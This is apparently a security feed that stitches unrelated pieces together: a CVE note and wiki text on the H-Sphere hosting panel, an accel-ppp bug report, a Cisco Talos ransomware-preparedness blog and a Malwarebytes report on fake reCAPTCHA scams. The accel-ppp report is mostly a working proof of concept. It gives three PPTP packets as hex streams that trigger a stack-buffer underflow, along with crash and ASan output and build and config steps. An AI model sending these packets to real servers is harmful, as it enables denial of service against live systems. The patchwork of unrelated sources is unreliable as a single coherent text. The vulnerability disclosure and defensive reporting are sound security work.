Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter.

H-Sphere

Stable release

3.6.2 / May 15, 2013

Written in

Java

Operating system

Linux, FreeBSD, Windows

Type

Web hosting control panel

License

proprietary

Website

http://www.parallels.com/products/hsphere/

**H-Sphere** is a web hosting Automation Control Panel for shared web hosting services that was developed by Positive Software and acquired by Parallels, Inc. in September 2007.\[1\] It is available for Linux, Unix, and Windows environments, and works with MySQL, PostgreSQL, and Microsoft SQL Server databases. H-Sphere has been written in Java and works with any SQL-compliant database.

**Features\[edit\]**

*   Built-in billing system with variety of payment methods
*   Various hosting solutions (\*nix and Windows, database, load balancing, RealMedia, MS Exchange, SharePoint, FreeVPS, etc.)
*   Electronic mail system with antivirus and antispam filtering and integrated WebMail
*   Around 30 Payment gateways and 6 E-Payment Providers supported
*   Integrated support center
*   Multiple user tools
*   Integrated PHP/MySQL applications, both built-in and by means of add-ons\[2\]

**Advantages\[edit\]**

*   **Scalable multiserver cluster**: different physical and logical servers (web, mail, DNS etc.) are managed from one control panel. More servers can be added on the fly.
*   **Multilingual support** includes English, German, Dutch, French, Italian, Spanish, Russian, Portuguese (Brazil), and several other languages integrated by means of add-ons.
*   H-Sphere is recognized for **end-user features** availability, such as mail system, site building tools, SSL, etc. "Beginning webmasters may find H-Sphere too complicated for their needs. More advanced users, however, appreciate the features and control that H-Sphere offers the end user."
*   H-Sphere may give place to other panels as regards its ease of use, but not its **online documentation**.
*   H-Sphere has enlisted a community of **online supporters** who name it among their favorite control panels.\[3\]
*   Integrated Backup capability with the ClusterLogics system created by Cartika

**Disadvantages\[edit\]**

*   Licenses for H-Sphere accounts are more expensive than those of its competitors. Though, it is noted that H-Sphere licenses are reusable and sold for a cluster, not for a server, as with Ensim Pro.
*   Some customers state H-Sphere has too many advanced features and thus is a too complicated solution for small hosting companies, especially as a single server installation. While others note that H-Sphere advantages are more demonstrable on multi-server clusters.
*   On a single server mode H-Sphere consumes more server resources than other major single server control panels.\[4\]
*   H-Sphere control panel interface extensively uses JavaScript. Some reviewers regard it as a disadvantage.\[5\]
*   H-Sphere control panel by default works on non-standard 8080 and 8443 ports that may be blocked by client-side firewalls; but this can easily be changed in the configuration.
*   H-Sphere (like cPanel, but unlike Plesk) provides online file source editing, however with H-Sphere only allows editing of .txt or .html files and without line numbers in edit mode, thus limiting PHP and other script editing possibilities.

**other webhosting control panel software\[edit\]**

*   Baifox
*   cPanel
*   DirectAdmin
*   Hosting Controller
*   ispCP
*   ISPConfig
*   Kloxo
*   Plesk
*   SysCP
*   Webmin

**See also\[edit\]**

*   Parallels, the maintainers of H-Sphere
*   Web hosting control panel
*   Comparison of web hosting control panels

**References\[edit\]**

1.  **^** "Parallels Newsroom". 28 February 2020.
2.  **^** "Archived copy". Archived from the original on 2007-01-17. Retrieved 2007-05-24.{{cite web}}: CS1 maint: archived copy as title (link) CS1 maint: bot: original URL status unknown (link) 24/7 Solutions.
3.  **^** h-sphere control panels on WHTop.com
4.  **^** Post here, your favorite Control Panel. WebHostingTalk Forums.
5.  **^** "Hosting Obzor". Archived from the original on 2007-06-09. Retrieved 2007-05-24.

**External links\[edit\]**

CVE-2022-30777: H-Sphere

ACCEL-PPP 1.12.0 has an out-of-bounds read in post_msg when processing a call_clear_request.

Using version accel-ppp version 1.12.0-149-gff91c73.

**Summary**

Sending PPTP Call Clear Request Packet after PPTP Start Control Connection Request and PPTP Outgoing Call Request to server can cause stack-buffer-underflow.

**PoC**

Here is the detailed information of sent packets:

*   Packet 1

    hexstream:
    009c00011a2b3c4d00010000010000000000000300000003ffff00016c6f63616c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000063616e616e69616e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    
    packet structure:
    ###[ PPTP Start Control Connection Request ]### 
      len       = 156
      type      = Control Message
      magic_cookie= 0x1a2b3c4d
      ctrl_msg_type= Start-Control-Connection-Request
      reserved_0= 0x0
      protocol_version= 256
      reserved_1= 0x0
      framing_capabilities= Asynchronous Framing supported+Synchronous Framing supported
      bearer_capabilities= Analog access supported+Digital access supported
      maximum_channels= 65535
      firmware_revision= 1
      host_name = 'local'
      vendor_string= 'cananian'
    

*   Packet 2

    hexstream:
    00a800011a2b3c4d00070000e60c00000000096000989680000000030000000300030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    
    packet structure:
    ###[ PPTP Outgoing Call Request ]### 
      len       = 168
      type      = Control Message
      magic_cookie= 0x1a2b3c4d
      ctrl_msg_type= Outgoing-Call-Request
      reserved_0= 0x0
      call_id   = 58892
      call_serial_number= 0
      minimum_bps= 2400
      maximum_bps= 10000000
      bearer_type= Any type of channel
      framing_type= Any type of framing
      pkt_window_size= 3
      pkt_proc_delay= 0
      phone_number_len= 0
      reserved_1= 0x0
      phone_number= ''
      subaddress= ''
    

*   Packet 3

    hexstream:
    001000011a2b3c4d000c0000e60c0000
    
    packet structure:
    ###[ PPTP Call Clear Request ]### 
      len       = 16
      type      = Control Message
      magic_cookie= 0x1a2b3c4d
      ctrl_msg_type= Call-Clear-Request
      reserved_0= 0x0
      call_id   = 58892
      reserved_1= 0x0
    

**Hint: the call_id field is randomly generated thus directly forwarding those three packets might not reproduce the scene. To reproduce it, it's neccessary to construct similar packets.**

**Crash report**

log of server:

    [2021-10-18 13:23:01.445] accel-ppp version 1.12.0-149-gff91c73
    [2021-10-18 13:23:01.477] pptp: iprange module disabled, improper IP configuration of PPP interfaces may cause kernel soft lockup
    [2021-10-18 13:23:01.479] l2tp: iprange module disabled, improper IP configuration of PPP interfaces may cause kernel soft lockup
    [2021-10-18 13:23:01.516] pptp: new connection from 127.0.0.1
    [2021-10-18 13:23:01.517] : : recv [PPTP Start-Ctrl-Conn-Request <Version 1> <Framing 3> <Bearer 3> <Max-Chan 65535>]
    [2021-10-18 13:23:01.517] : : send [PPTP Start-Ctrl-Conn-Reply <Version 1> <Result 1> <Error 0> <Framing 3> <Bearer 3> <Max-Chan 1>]
    [2021-10-18 13:23:02.516] : : recv [PPTP Outgoing-Call-Request <Call-ID e60c> <Call-Serial 0> <Min-BPS 2400> <Max-BPS 10000000> <Bearer 3> <Framing 3> <Window-Size 3> <Delay 0>]
    [2021-10-18 13:23:02.517] : : send [PPTP Outgoing-Call-Reply <Call-ID 615> <Peer-Call-ID e60c> <Result 1> <Error 0> <Cause 0> <Speed 10000000> <Window-Size 3> <Delay 0> <Channel 0>]
    [2021-10-18 13:23:02.517] : : lcp_layer_init
    [2021-10-18 13:23:02.517] : : auth_layer_init
    [2021-10-18 13:23:02.517] : : ccp_layer_init
    [2021-10-18 13:23:02.517] : : ipcp_layer_init
    [2021-10-18 13:23:02.517] : : ipv6cp_layer_init
    [2021-10-18 13:23:02.517] : : ppp establishing
    [2021-10-18 13:23:02.518] : 78a9b1ca73684d70: lcp_layer_start
    [2021-10-18 13:23:02.518] : 78a9b1ca73684d70: send [LCP ConfReq id=71 <auth MSCHAP-v2> <mru 1400> <magic 465aee3b>]
    [2021-10-18 13:23:03.495] terminate, sig = 15
    [2021-10-18 13:23:03.495] : 78a9b1ca73684d70: terminate
    [2021-10-18 13:23:03.495] : 78a9b1ca73684d70: lcp_layer_finish
    [2021-10-18 13:23:03.496] : 78a9b1ca73684d70: pptp: ppp finished
    [2021-10-18 13:23:03.496] : 78a9b1ca73684d70: send [PPTP Call-Disconnect-Notify <Call-ID ce6> <Result 3> <Error 0> <Cause 0>]
    [2021-10-18 13:23:03.496] : 78a9b1ca73684d70: send [PPTP Stop-Ctrl-Conn-Request <Reason 0>]
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: lcp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: auth_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: ccp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: ipcp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: ipv6cp_layer_free
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: recv [PPTP Call-Clear-Request <Call-ID e60c>]
    [2021-10-18 13:23:03.521] : 78a9b1ca73684d70: send [PPTP Call-Disconnect-Notify <Call-ID ce6> <Result 4> <Error 0> <Cause 0>]
    

Here is the asan report:

    ==2434668==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7f785e8afe1f at pc 0x000000499d97 bp 0x7f7862ed07c0 sp 0x7f7862ecff88
    READ of size 149 at 0x7f785e8afe1f thread T7
        #0 0x499d96 in __asan_memcpy /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
        #1 0x7f786b3e5d1f in post_msg /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:150:3
        #2 0x7f786b3e6a19 in send_pptp_call_disconnect_notify /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:385:9
        #3 0x7f786b3e13bd in pptp_call_clear_rqst /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:404:9
        #4 0x7f786b3e13bd in process_packet /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:478:11
        #5 0x7f786b3e13bd in pptp_read /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:527:9
        #6 0x7f78714c81c1 in ctx_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:252:10
        #7 0x7f78714c81c1 in triton_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:192:5
        #8 0x7f7871485608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477:8
        #9 0x7f7870e5e292 in clone /build/glibc-eX1tMB/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95
    
    Address 0x7f785e8afe1f is located in stack of thread T7 at offset 31 in frame
        #0 0x7f786b3e666f in send_pptp_call_disconnect_notify /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:373
    
      This frame has 1 object(s):
        [32, 180) 'msg' (line 374) <== Memory access at offset 31 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    Thread T7 created by T0 here:
        #0 0x484d4c in pthread_create /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:205:3
        #1 0x7f78714c6eee in create_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:320:9
        #2 0x7f78714cdc17 in triton_run /root/projects/accel-ppp/accel-pppd/triton/triton.c:744:7
        #3 0x559603 in main /root/projects/accel-ppp/accel-pppd/main.c:415:2
        #4 0x7f7870d630b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: stack-buffer-underflow /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
    Shadow bytes around the buggy address:
      0x0fef8bd0df70: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0df80: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0df90: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0dfa0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0dfb0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
    =>0x0fef8bd0dfc0: f1 f1 f1[f1]00 00 00 00 00 00 00 00 00 00 00 00
      0x0fef8bd0dfd0: 00 00 00 00 00 00 04 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x0fef8bd0dfe0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0dff0: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0e000: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
      0x0fef8bd0e010: f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5 f5
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2434668==ABORTING
    

**Reproduce info**

Build access-ppp:

mkdir build && cd build
cmake -DCMAKE\_C\_COMPILER=clang -DCMAKE\_CXX\_COMPILER=clang++ -DCMAKE\_C\_FLAGS="\-fsanitize=address -g" -DCMAKE\_CXX\_FLAGS="\-fsanitize=address -g" -DBUILD\_DRIVER=false -DCMAKE\_INSTALL\_PREFIX=/usr/local -DCMAKE\_BUILD\_TYPE=Debug -DLOG\_PGSQL=TRUE -DSHAPER=TRUE -DRADIUS=TRUE -DNETSNMP=TRUE ..
CC=clang CXX=clang++ CFLAGS="\-fsanitize=address -g" CXXFLAGS="\-fsanitize=address -g" make -j
make install

Run access-pppd, use the following command:

accel-pppd -c /etc/accel-ppp.conf

The running configuration /etc/accel-ppp.conf is:

    [modules]
     log_file
     #log_syslog
     #log_tcp
     #log_pgsql
     
     pptp
     l2tp
     #sstp
     #pppoe
     #ipoe
     
     auth_mschap_v2
     auth_mschap_v1
     auth_chap_md5
     auth_pap
     
     #radius
     chap-secrets
     
     ippool
     
     pppd_compat
     
     #shaper
     #net-snmp
     #logwtmp
     #connlimit
     
     #ipv6_nd
     #ipv6_dhcp
     #ipv6pool
     
     [core]
     log-error=/var/log/accel-ppp/core.log
     thread-count=4
     
     [common]
     #single-session=replace
     #single-session-ignore-case=0
     #sid-case=upper
     #sid-source=seq
     #max-sessions=1000
     #max-starting=0
     #check-ip=0
     
     [ppp]
     verbose=1
     min-mtu=1280
     mtu=1400
     mru=1400
     #accomp=deny
     #pcomp=deny
     #ccp=0
     #mppe=require
     ipv4=require
     ipv6=deny
     ipv6-intf-id=0:0:0:1
     ipv6-peer-intf-id=0:0:0:2
     ipv6-accept-peer-intf-id=1
     lcp-echo-interval=20
     #lcp-echo-failure=3
     lcp-echo-timeout=120
     unit-cache=1
     #unit-preallocate=1
     
     [auth]
     #any-login=0
     #noauth=0
     
     [pptp]
     verbose=1
     #echo-interval=30
     ip-pool=pool1
     #ipv6-pool=pptp
     #ipv6-pool-delegate=pptp
     ifname=pptp%d
     #port=9300
     #mppe=prefer
     
     [pppoe]
     verbose=1
     #ac-name=xxx
     #service-name=yyy
     #pado-delay=0
     #pado-delay=0,100:100,200:200,-1:500
     called-sid=mac
     #tr101=1
     #padi-limit=0
     #ip-pool=pppoe
     #ipv6-pool=pppoe
     #ipv6-pool-delegate=pppoe
     #ifname=pppoe%d
     #sid-uppercase=0
     #vlan-mon=eth0,10-200
     #vlan-timeout=60
     #vlan-name=%I.%N
     #interface=eth1,padi-limit=1000
     interface=ens18
     
     [l2tp]
     verbose=1
     #dictionary=/usr/local/share/accel-ppp/l2tp/dictionary
     #hello-interval=60
     #timeout=60
     #rtimeout=1
     #rtimeout-cap=16
     #retransmit=5
     #recv-window=16
     #host-name=accel-ppp
     #dir300_quirk=0
     #secret=
     #dataseq=allow
     #reorder-timeout=0
     #ip-pool=l2tp
     #ipv6-pool=l2tp
     #ipv6-pool-delegate=l2tp
     #ifname=l2tp%d
     
     [sstp]
     verbose=1
     #cert-hash-proto=sha1,sha256
     #cert-hash-sha1=
     #cert-hash-sha256=
     #accept=ssl,proxy
     #ssl-protocol=tls1,tls1.1,tls1.2,tls1.3
     #ssl-dhparam=/etc/ssl/dhparam.pem
     #ssl-ecdh-curve=prime256v1
     #ssl-ciphers=DEFAULT
     #ssl-prefer-server-ciphers=0
     #ssl-ca-file=/etc/ssl/sstp-ca.crt
     #ssl-pemfile=/etc/ssl/sstp-cert.pem
     #ssl-keyfile=/etc/ssl/sstp-key.pem
     #host-name=domain.tld
     #http-error=allow
     #timeout=60
     #hello-interval=60
     #ip-pool=sstp
     #ipv6-pool=sstp
     #ipv6-pool-delegate=sstp
     #ifname=sstp%d
     
     [ipoe]
     verbose=1
     username=ifname
     #password=username
     lease-time=600
     #renew-time=300
     #rebind-time=525
     max-lease-time=3600
     #unit-cache=1000
     #l4-redirect-table=4
     #l4-redirect-ipset=l4
     #l4-redirect-on-reject=300
     #l4-redirect-ip-pool=pool1
     shared=0
     ifcfg=1
     mode=L2
     start=dhcpv4
     #start=up
     #ip-unnumbered=1
     #proxy-arp=0
     #nat=0
     #proto=100
     #relay=10.10.10.10
     #vendor=Custom
     #weight=0
     #attr-dhcp-client-ip=DHCP-Client-IP-Address
     #attr-dhcp-router-ip=DHCP-Router-IP-Address
     #attr-dhcp-mask=DHCP-Mask
     #attr-dhcp-lease-time=DHCP-Lease-Time
     #attr-dhcp-renew-time=DHCP-Renewal-Time
     #attr-dhcp-rebind-time=DHCP-Rebinding-Time
     #attr-dhcp-opt82=DHCP-Option82
     #attr-dhcp-opt82-remote-id=DHCP-Agent-Remote-Id
     #attr-dhcp-opt82-circuit-id=DHCP-Agent-Circuit-Id
     #attr-l4-redirect=L4-Redirect
     #attr-l4-redirect-table=4
     #attr-l4-redirect-ipset=l4-redirect
     #lua-file=/etc/accel-ppp.lua
     #offer-delay=0,100:100,200:200,-1:1000
     #vlan-mon=eth0,10-200
     #vlan-timeout=60
     #vlan-name=%I.%N
     #ip-pool=ipoe
     #ipv6-pool=ipoe
     #ipv6-pool-delegate=ipoe
     #idle-timeout=0
     #session-timeout=0
     #soft-terminate=0
     #check-mac-change=1
     #calling-sid=mac
     #local-net=192.168.0.0/16
     interface=eth0
     
     [dns]
     #dns1=172.16.0.1
     #dns2=172.16.1.1
     
     [wins]
     #wins1=172.16.0.1
     #wins2=172.16.1.1
     
     [radius]
     #dictionary=/usr/local/share/accel-ppp/radius/dictionary
     nas-identifier=accel-ppp
     nas-ip-address=127.0.0.1
     gw-ip-address=192.168.100.1
     server=127.0.0.1,testing123,auth-port=1812,acct-port=1813,req-limit=50,fail-timeout=0,max-fail=10,weight=1
     dae-server=127.0.0.1:3799,testing123
     verbose=1
     #timeout=3
     #max-try=3
     #acct-timeout=120
     #acct-delay-time=0
     #acct-on=0
     #acct-interim-interval=0
     #acct-interim-jitter=0
     #default-realm=
     #strip-realm=0
     #attr-tunnel-type=My-Tunnel-Type
     
     [client-ip-range]
     0.0.0.0/0
     
     [ip-pool]
     gw-ip-address=192.168.0.1
     #vendor=Cisco
     #attr=Cisco-AVPair
     attr=Framed-Pool
     192.168.0.2-255
     192.168.1.1-255,name=pool1
     192.168.2.1-255,name=pool2
     192.168.3.1-255,name=pool3
     192.168.4.1-255,name=pool4,next=pool1
     192.168.4.0/24
     
     [log]
     log-file=/var/log/accel-ppp/accel-ppp.log
     log-emerg=/var/log/accel-ppp/emerg.log
     log-fail-file=/var/log/accel-ppp/auth-fail.log
     log-debug=/dev/stdout
     syslog=accel-pppd,daemon
     #log-tcp=127.0.0.1:3000
     copy=1
     color=1
     #per-user-dir=per_user
     #per-session-dir=per_session
     #per-session=1
     level=5
     
     [log-pgsql]
     conninfo=user=log
     log-table=log
     
     [pppd-compat]
     verbose=1
     #ip-pre-up=/etc/ppp/ip-pre-up
     ip-up=/etc/ppp/ip-up
     ip-down=/etc/ppp/ip-down
     #ip-change=/etc/ppp/ip-change
     radattr-prefix=/var/run/radattr
     #fork-limit=16
     
     [chap-secrets]
     gw-ip-address=192.168.100.1
     chap-secrets=/etc/ppp/chap-secrets.ppp
     #encrypted=0
     #username-hash=md5
     
     [shaper]
     #attr=Filter-Id
     #down-burst-factor=0.1
     #up-burst-factor=1.0
     #latency=50
     #mpu=0
     #mtu=0
     #r2q=10
     #quantum=1500
     #moderate-quantum=1
     #cburst=1534
     #ifb=ifb0
     up-limiter=police
     down-limiter=tbf
     #leaf-qdisc=sfq perturb 10
     #leaf-qdisc=fq_codel [limit PACKETS] [flows NUMBER] [target TIME] [interval TIME] [quantum BYTES] [[no]ecn]
     #rate-multiplier=1
     #fwmark=1
     #rate-limit=2048/1024
     verbose=1
     
     [cli]
     verbose=1
     telnet=127.0.0.1:2000
     tcp=127.0.0.1:2001
     #password=123
     #sessions-columns=ifname,username,ip,ip6,ip6-dp,type,state,uptime,uptime-raw,calling-sid,called-sid,sid,comp,rx-bytes,tx-bytes,rx-bytes-raw,tx-bytes-raw,rx-pkts,tx-pkts
     
     [snmp]
     master=0
     agent-name=accel-ppp
     
     [connlimit]
     limit=10/min
     burst=3
     timeout=60
     
     [ipv6-pool]
     #gw-ip6-address=fc00:0:1::1
     #vendor=
     #attr-prefix=Delegated-IPv6-Prefix-Pool
     #attr-address=Stateful-IPv6-Address-Pool
     fc00:0:1::/48,64
     fc00:0:2::/48,64,name=pool1
     fc00:0:3::/48,64,name=pool2,next=pool1
     delegate=fc00:1::/36,48
     delegate=fc00:2::/36,48,name=pool3
     delegate=fc00:3::/36,48,name=pool4,next=pool3
     
     [ipv6-dns]
     #fc00:1::1
     #fc00:1::2
     #fc00:1::3
     #dnssl=suffix1.local.net
     #dnssl=suffix2.local.net.
     
     [ipv6-dhcp]
     verbose=1
     pref-lifetime=604800
     valid-lifetime=2592000
     route-via-gw=1
    

use chap-secrets and the /etc/ppp/chap-secrets.ppp is as follows:

    # Secrets for authentication using CHAP
    # client	server	secret			IP addresses
    fouzhe * 123 *

CVE-2021-42870: Abnormal packet sequence can cause stack-buffer-underflow · Issue #158 · xebd/accel-ppp

By Nate Pors.
Top executives are increasingly dreading the phone call from their fellow employees notifying them that their company has been hit by a cyber attack. Nearly every week in 2021 and early 2022, a prominent organization has been in the media spotlight as their public relations team...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Nate Pors._

Top executives are increasingly dreading the phone call from their fellow employees notifying them that their company has been hit by a cyber attack. Nearly every week in 2021 and early 2022, a prominent organization has been in the media spotlight as their public relations team struggles to explain how they were attacked and how they can regain consumer confidence. A recent survey showed that 37 percent of organizations surveyed had been affected by ransomware attacks in the last year.

Worse, the days when executive leadership teams could fully delegate responsibility to a CISO are over. Regardless of reality, surveys have shown that about 40 percent of the public perception of fault for a ransomware attack land squarely on the CEO’s shoulders, and that 36 percent of attacks result in the loss of C-level talent. While executive involvement in the security program does not guarantee a successful defense, it does give the Executive Leadership Team (ELT) a degree of ownership of the final product, as well as the ability to speak confidently and knowledgeably to the public. 

Cisco Talos Incident Response (CTIR) has assisted hundreds of organizations through recent ransomware incidents and executive tabletop exercises and compiled the following observations for how top executives can best prepare and evaluate their teams.

**When, not if**

Many teams center their plans around the prevention of the initial attack, not the response, after an adversary successfully gains a foothold. A ransomware attack is always a multi-stage process, and it is up to members of the ELT to set a strategy that slows and frustrates the adversary during an attack. Those aspects of planning should focus on quick response, tested containment techniques, and eradication. Some examples of questions you should ask might be:

*   Does your team have Standard Operating Procedures for and regularly practice containment “battle drills” such as quickly changing all privileged account passwords throughout the entire enterprise? 
*   Do they have ways to quickly isolate a compromised network segment to preserve the integrity of the rest of the network? 
*   Is your team working toward zero-trust architecture? 
*   Does your team know where your critical data resides and is it encrypted at rest? 
*   Do they know what your business-critical services are, and what technical dependencies they have? 
*   Are your backups redundant and protected from casual access by a compromised administrator account? 
*   The answers to these tough questions can be the difference between success and failure when facing an impending ransomware attack.

  
**Teamwork makes the dream work**

It’s hard to build an effective cross-disciplinary team in the heat of the moment. Almost every CISO delegates responsibility for coordinating immediate actions in a cybersecurity emergency to a trusted subordinate often called an “incident commander” or “CIRT lead.” When your incident commander builds the ransomware “war room,” do they have an at-a-glance roster to ensure the right people are included? Since your time as an executive is very limited, how do you want to be updated, and does the incident commander and/or CISO understand that requirement? Is legal embedded into your organization’s incident command structure?

Your top performers will often push themselves beyond the point of exhaustion during a major incident and make mistakes as a result. Do you have trusted individuals holding each other and their teams accountable to set a proper tempo? Generally speaking, incident responders can only perform at peak mental efficiency for about 10 - 12 hours per day, so that figure can be used to structure a good rotation. Does your team have an effective rest plan with redundancy built-in for key roles in case of personal life emergencies? CTIR has observed that top-tier security operations centers (SOCs) structure their emergency personnel planning similarly to personnel planning for military operations, in the sense that every person has one or two designated backups fully trained to perform their role.

Similarly, CTIR has observed that top-tier SOCs coordinate seamlessly with third parties. While we are honored to be the first call for many of our customers in case of an emergency, the most successful responses also often involve specialized support from third-party security software/hardware providers as well. Does your incident response team have those relationships already established and have well-documented procedures for getting their support?

**Can you hear me now?**

One of the most common questions we hear during tabletop exercises is: “How can we prepare for ransomware communications?” In terms of internal communication, it is critical to define what communication system will be used to send notifications. Is it capable of reaching and rallying the team after hours? Assuming the worst-case scenario where the entire corporate network is offline, do you have a truly out-of-band (OOB) communication method? Referring to the military planning model, it is no accident that even the lowest-level operations orders define primary, secondary, and tertiary methods of communication.

Time matters for external communications. We have observed that attacks on high-profile organizations generally appear in the media within 24 hours. Do your communications and PR teams have pre-built templates they can use for initial public notifications of an incident? Writing them now will save time and ensure that key details are not overlooked during a crisis. What are the key points needed to take control of the news cycle early? What is the approval chain — does the CEO need to personally review it, or can it be released at the direction of the head of corporate communications? 

A thoughtful CEO might want to establish circumstances under which direct review is required, such as in the case of confirmed sensitive data compromise, but give corporate communications the authority to publish notifications without CEO review under all other circumstances. If you have a customer-facing team like customer care or help desk, is there a canned message they can provide that keeps everyone calm while ensuring that sensitive information is not shared? In all cases, legal counsel should be consulted and work in partnership with corporate communications.

**Negotiating with attackers**

Are you willing to set a hardline policy that your organization will never pay a ransom under any circumstances? No data exists to say whether a publicized statement to that effect decreases the likelihood of being targeted, but CTIR has observed the inverse effect. Organizations that set a precedent for making ransom payments are heavily targeted since they are perceived as a guaranteed payday by adversaries. In fact, a recent survey showed that 80 percent of organizations that paid a ransom were reattacked shortly afterward.

If you cannot set the hardline policy of non-payment, many secondary considerations are important, including the legality of the payment if an OFAC-sanctioned entity is involved. Do you have your legal counsel, cyber insurer, and possibly a professional ransomware negotiation firm you can contact quickly? As always, consult with your legal counsel.

CTIR never recommends that victims of ransomware never pay the extortion payment, since it is impossible to guarantee the return or decryption of the targeted data. However, we have helped customers draft ransomware payment decision trees to guide them through the decision qualitatively or quantitatively, ensuring that they are making a well-reasoned decision while under extreme pressure. The Ransomware Task Force, an elite team on which CTIR was proud to represent Cisco, recently recommended requiring a cost-benefit analysis before payment. 

**Advice to any CEO for preparing a ransomware preparedness plan**

*   The executive leadership team can and should be closely involved with the development of the anti-ransomware plan.
*   Attempted ransomware attacks are almost inevitable for the average organization today, but proper post-breach actions can allow excellent damage mitigation.
*   Team structure and good communications plans matter just as much as strong cybersecurity tools and configuration.

Ransom payment considerations are complex and there is no “one-size-fits-all” answer, but in most cases, paying a ransom leads to increased targeting in the future.

Ransomware: How executives should prepare given the current threat landscape

Threat actors have launched a new campaign that starts with compromised WordPress sites and leads to fake reCAPTCHA sites designed to get visitors to accept web push notifications.
The post Fake reCAPTCHA forms dupe users via compromised WordPress sites appeared first on Malwarebytes Labs.

Researchers at Sucuri investigated a number of WordPress websites complaining about unwanted redirects and found websites that use fake CAPTCHA forms to get the visitor to accept web push notifications.

These websites are a new wave of a campaign that leverages many compromised WordPress sites.

**CAPTCHA**

CAPTCHA (“Completely Automated Public Turing test to tell Computers and Humans Apart”) is one of the annoyances that we have learned to take for granted when we browse the Internet. Scientists developed CAPTCHA as a method to tell humans and bots apart so as to to keep bots from accessing sites or systems where they are not welcome.

Google bought and owns reCAPTCHA, which represents a CAPTCHA system expressly developed to reduce the needed amount of user interaction. The original version asked users to decipher hard to read text or match images. Version 2 required users to decipher text or match images if the analysis of cookies and canvas rendering suggested an automatic download of the page. Since version 3, reCAPTCHA doesn’t interrupt users, running automatically when users load pages or click buttons.

The basic version of a real reCAPTCHA the threat actors used as a template to create the fake ones looks like this:

_legitimate reCAPTCHA_

**The campaign**

The fake CAPTCHA sites are part of a long lasting campaign responsible for injecting malicious scripts into compromised WordPress websites. This campaign leverages known vulnerabilities in WordPress themes and plugins and has impacted an enormous number of websites over the years.

The compromised websites all share a common issue. The threat actors injected malicious JavaScript within the affected website’s files and database. Attackers attempted to automatically infect any .js file with jQuery in the name, on a compromised website. They then injected obfuscated code when successful. This malicious JavaScript was appended under the current script or under the head of the page where it was fired on every page load, redirecting site visitors to the destination chosen by the threat actor.

The Malwarebytes Threat Intelligence Team tracked a rogue affiliate’s traffic which flowed through the same **local\[.\]drakefollow\[.\]com** subdomain that was mentioned in the Sucuri blog. The threat actor chose to promote a legitimate security product in this case, but might as well have led visitors to potentially unwanted programs (PUPs), adware, or tech support scams.

_Traffic flow from compromised WordPress site to rogue affilate’s site_

**The fake CAPTCHA**

At this point in the chain of redirections, the fake reCAPTCHA websites kick in. The fake reCAPTCHA sites are the final step towards duping the visitor. The unsuspecting visitor will land on a site that tries to trick them into accepting push notifications from the landing page’s domain.

_fake reCAPTCHA_

Visitors think they need to click “Allow” to get past the CAPTCHA screen, when in fact they are giving permission to the domain to send them push notifications.

